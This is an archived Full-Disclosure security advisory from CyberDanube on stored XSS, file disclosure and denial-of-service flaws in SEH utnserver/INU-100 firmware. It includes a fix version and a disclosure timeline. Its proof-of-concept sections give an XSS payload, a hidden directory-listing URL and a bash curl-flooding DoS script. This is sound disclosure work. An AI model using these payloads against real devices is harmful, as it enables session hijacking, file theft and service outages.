lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <AM9P190MB1281FC0FEDE056E06F0626E0FEF82@AM9P190MB1281.EURP190.PROD.OUTLOOK.COM>
Date: Tue, 4 Jun 2024 08:16:19 +0000
From: Thomas Weber via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CyberDanube Security Research 20240604-0 | Multiple
 Vulnerabilities in utnserver Pro/ProMAX/INU-100

CyberDanube Security Research 20240604-0
-------------------------------------------------------------------------------
                title| Multiple Vulnerabilities
              product| SEH utnserver Pro/ProMAX / INU-100
   vulnerable version| 20.1.22
        fixed version| 20.1.28
           CVE number| CVE-2024-5420, CVE-2024-5421, CVE-2024-5422
               impact| High
             homepage| https://www.seh-technology.com/
                found| 2024-03-04
                   by| T. Weber (Office Vienna)
                     | CyberDanube Security Research
                     | Vienna | St. Pölten
                     |
                     | https://www.cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"We are SEH from Bielefeld - manufacturer of high-quality network solutions.
With over 35 years of experience in the fields of printing and networks, we
offer our customers a broad and high-level expertise in solutions for all types
of business environments."

Source: https://www.seh-technology.com/us/company/about-us.html


Vulnerable versions
-------------------------------------------------------------------------------
utnserver Pro / 20.1.22
utnserver ProMAX / 20.1.22
INU-100 / 20.1.22

Vulnerability overview
-------------------------------------------------------------------------------
1) Stored Cross-Site Scripting (CVE-2024-5420)
A Stored Cross-Site Scripting vulnerability was identified in the web interface
of the device. Multiple parameters, e.g. the device description, can be abused
to inject JavaScript code. An attacker can exploit this vulnerability by luring
a victim to visit a malicious website. Furthermore, it is possible to hijack
the session of the attacked user.

2) Authenticated File Disclosure (CVE-2024-5421)
Files and content of directories can be disclosed by integrated functions of
the device.

3) Denial of Service (CVE-2024-5422)
A Denial-of-Service vulnerability has been identified in the web interface of
the device. This can be triggered by sending a lot of requests that trigger
serial interface access on the device.

Proof of Concept
-------------------------------------------------------------------------------
1) Stored Cross-Site Scripting (CVE-2024-5420)
By accessing to the following URL, an attacker can modify the device
description:
http://$IP/device/description_en.html

By using malicious JavaScript payload, it is possible to execute arbitrary
code. This snippet demonstrates such a payload:
"><script>alert(document.location)</script>

Saving this text to the device description leads to a persistent cross-site
scripting. Therefore, everyone who openes the device description executes the
injected code in the context of the own browser.

2) Authenticated File Disclosure (CVE-2024-5421)
A hidden function in the web-interface of the device can be used to disclose
directories and files on operating system level. The function can be accessed
directly via the browser:

http://$IP/info/dir?/

This lists the current directory and provides the files to be downloaded.

3) Denial of Service (CVE-2024-5422)
For triggering a denial of service on the device, multiple file descriptors
are opened by using the following script:
-------------------------------------------------------------------------------
#!/bin/bash
echo "Parameters: $1 $2"
last_iter=$(($2 - 1))
for ((i=1; i<=$2; i++))
    do
    echo "[$i] Downloading application binary"
    if [[ "$i" == "$last_iter" ]];then
        curl http://$1/info/file?/application --output ./file_${i}.txt &> /dev/null
    else
        curl http://$1/info/file?/application --output ./file_${i}.txt &> /dev/null &
    fi
done
-------------------------------------------------------------------------------

The vulnerabilities were manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution
-------------------------------------------------------------------------------
Install firmware version 20.1.28 to fix the vulnerabilities.

Workaround
-------------------------------------------------------------------------------
None


Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends SEH Computertechnik customers to upgrade the firmware to
the latest version available.


Contact Timeline
-------------------------------------------------------------------------------
2024-03-11: Contacting SEH Computertechnik. Received reply from support. Sent
            advisory to support.
2024-03-20: Asked for an update. Contact stated, that an internal timeline will
            be defined.
2024-04-10: Asked for an update. Contact stated, that the vulnerabilities will
            be patched soon.
2024-04-16: Contact sent link to patched firmware release candidate.
2024-05-31: Notified SEH Computertechnik that advisory will be released first
            week of June. Received confirmation from SEH Computertechnik.
2024-06-04: Coordinated release of security advisory.


Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2024
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ